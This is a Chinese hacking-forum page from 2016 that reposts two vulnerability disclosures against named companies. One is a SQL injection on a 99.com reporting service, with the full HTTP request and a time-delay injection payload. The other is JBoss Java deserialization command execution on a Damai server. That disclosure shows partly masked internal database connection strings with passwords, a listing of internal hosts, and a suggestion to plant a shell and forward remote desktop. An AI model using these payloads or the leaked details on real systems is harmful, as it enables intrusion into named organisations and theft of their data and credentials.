HanDs
管理员


学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

详细说明:

目标:syjf.data.99.com

检测发现以下地方存在SQL注入:(POST中的platformName/productName,Stacked query)

code 区域
POST /MobileGameReporting/Services/MobileGameServices.asmx/GetChannelCodeByProductId HTTP/1.1
Origin: http://syjf.data.99.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
DNT: 1
Content-Type: application/json
Content-Length: 65
Referer: http://syjf.data.99.com/MobileGameReporting/Services/MobileGameServices.asmx/GetChannelCodeByProductId
Cookie: ASP.NET_SessionId=u0h0qo55ifdaks45c4om1g45
Host: syjf.data.99.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

{"platformName":"","productName":"106599"}



Payload:(延时5秒)

code 区域
"productName":"106599; waitfor delay '0:0:5' -- -"

漏洞证明:

1、当前数据库用户

user.jpg



2、所有数据库

dbs.jpg



3、数据表,具体就不深入了

tb.jpg

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
2016-7-14 #1楼
HanDs
管理员

[7月漏洞公开] 大麦网一处java反序列化命令执行/可探测内网/涉及多个内网数据库配置信息 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

java反序列化

详细说明:

http://122.113.39.236:8090/



jboss java反序列化

111.png







111.png





好多内网的数据库连接信息



mask 区域
*****uot; encoding=&q*****
*****oot*****
*****="192.168.88.51:112*****
*****urce=192.168.66.22\SQL2008,14330;persist security info=Fa*****
*****uzrce=192.168.66.22\SQL2008,14330;persist security info=F*****
*****ource=192.168.66.22\SQL2008,14330;persist security info=Fa*****
*****iang_pwd; database=dianjiang; pooling=true;charset=utf8;Min*****
*****ource=192.168.66.22\SQL2008,14330;persist security info=Fa*****
*****rce=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****ce=192.168.66.22\SQL2008,14330;persist security info=F*****
*****ource=192.168.66.22\SQL2008,14330;persist security info*****
*****rce=192.168.66.22\SQL2008,14330;persist security info=Fa*****
***** value=""*****
*****e=192.168.66.22\SQL2008,14330;persist security info=False*****
*****quot;192.168.66.12:2701*****
*****quot;192.168.66.12:2701*****
*****rce=192.168.3.32\SQL2008;persist security info=False;init*****
*****=192.168.66.22\SQL2008,14330;persist security info=False;in*****
*****urce=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****ce=192.168.66.22\SQL2008,14330;persist security info=Fals*****
*****e=192.168.66.22\SQL2008,14330;persist security info=False;in*****
*****rce=192.168.66.22\SQL2008,14330;persist security info=False;i*****
*****ource=192.168.66.22\SQL2008,14330;persist security info=Fa*****
*****192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****=192.168.66.22\SQL2008,14330;persist security info=Fals*****
***** source=192.168.66.22\SQL2008,14330;persist security info=F*****
*****rce=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****uot; value="&qu*****
*****ource=192.168.66.22\SQL2008,14330;persist security info=Fals*****
*****urce=192.168.66.22\SQL2008,14330;persist security info=False;*****
*****urce=192.168.66.22\SQL2008,14330;persist security info=*****
***** source=192.168.3.32\SQL2008;persist security info=False;in*****
*****ource=192.168.66.22\SQL2008,14330;persist security info=False*****
***** source=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****=192.168.66.22\SQL2008,14330;persist security info=False;init*****
*****=192.168.66.22\SQL2008,14330;persist security info=False;in*****
*****e=192.168.66.22\SQL2008,14330;persist security info=False;in*****
*****urce=192.168.66.22\SQL2008,14330;persist security info=Fals*****
*****ce=192.168.66.22\SQL2008,14330;persist security info=False;*****
*****ource=192.168.3.32\SQL2008;persist security info=False;in*****
*****a source=192.168.66.22\SQL2008,14330;persist security info=Fa*****
*****source=192.168.66.22\SQL2008,14330;persist security info=Fals*****
*****a source=192.168.3.32\SQL2008;persist security info=False;i*****
*****ce=192.168.66.22\SQL2008,14330;persist security info=False*****
*****192.168.66.22\SQL2008,14330;persist security info=Fal*****
***** source=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****rce=192.168.66.22\SQL2008,14330;persist security info=F*****
*****22\SQL2008,14330;persist security info=False;initial catalog=Damai_BU*****
*****ourcez=192.168.66.22\SQL2008,14330;persist security info=False*****
***** source=192.168.66.22\SQL2008,14330;persist security info=Fa*****
*****ource=192.168.66.22\SQL2008,14330;persist security info=Fals*****
***** source=192.168.3.32\SQL2008;persist security info=False;i*****
*****ce=192.168.66.22\READONLY,1433;persist security info=False;in*****
*****urce=192.168.66.22\READONLY,1433;persist security info=False;i*****
*****ce=192.168.66.22\READONLY,1433;persist security info=False;in*****
*****ource=192.168.66.22\READONLY,1433;persist security info=Fals*****
*****ource=192.168.66.22\READONLY,1433;persist security info=Fals*****
*****urce=192.168.66.22\READONLY,1433;persist security info=False;*****
*****192.168.66.22\SQL2008,14330;persist security info=Fals*****
*****rce=192.168.66.22\SQL2008,14330;persist security info=Fa*****
*****e=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****e=192.168.66.22\SQL2008,14330;persist security info=Fal*****
*****t; value="30000&*****
*****.12;Database=notify;Uid=notify;Pwd=no*****
***** id=message_center; password=message_center_pwd;*****
*****3read;data source=192.168.66.22\READONLY,1433;persist security *****
*****t; password=mysql; database=ball; pooling=false;c*****
*****enew_3_pwd; database=movienew_3; pooling=true*****
*****ew_3_pwd; database=movienew_3; pooling=true;ch*****
***** database=super_ticket_4.0; pooling=true;charset=utf8;Min Pool Size=0;*****
*****ot&g*****
*****===========*****





111.png





还是内网 net view

服务器名称 注释



-------------------------------------------------------------------------------

\\DB_CENTER

\\DB_DATAMARTS

\\DM-B2-1

\\DM-JR-IE8 z

\\OXO-05373CE6C0A

\\OXO-5B8924BBDD3

\\OXO-94CE030D68F

\\OXO-A33B4DF673D

\\OXO-DE019604DBA

\\TEST-8846

\\TEST-B4

\\TEST-B5

\\WANGXIUL-25C914

\\WIN-5PVMQ3EBE1A

\\WUXIAN-TEST

命令成功完成。

=================================================================



111.png





system权限 可以找个目录getshell 然后把3389转发出来

漏洞证明:

111.png

修复方案:

jboss java反序列化


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
大麦 j av a 序列化 命令 执行 /
#2楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复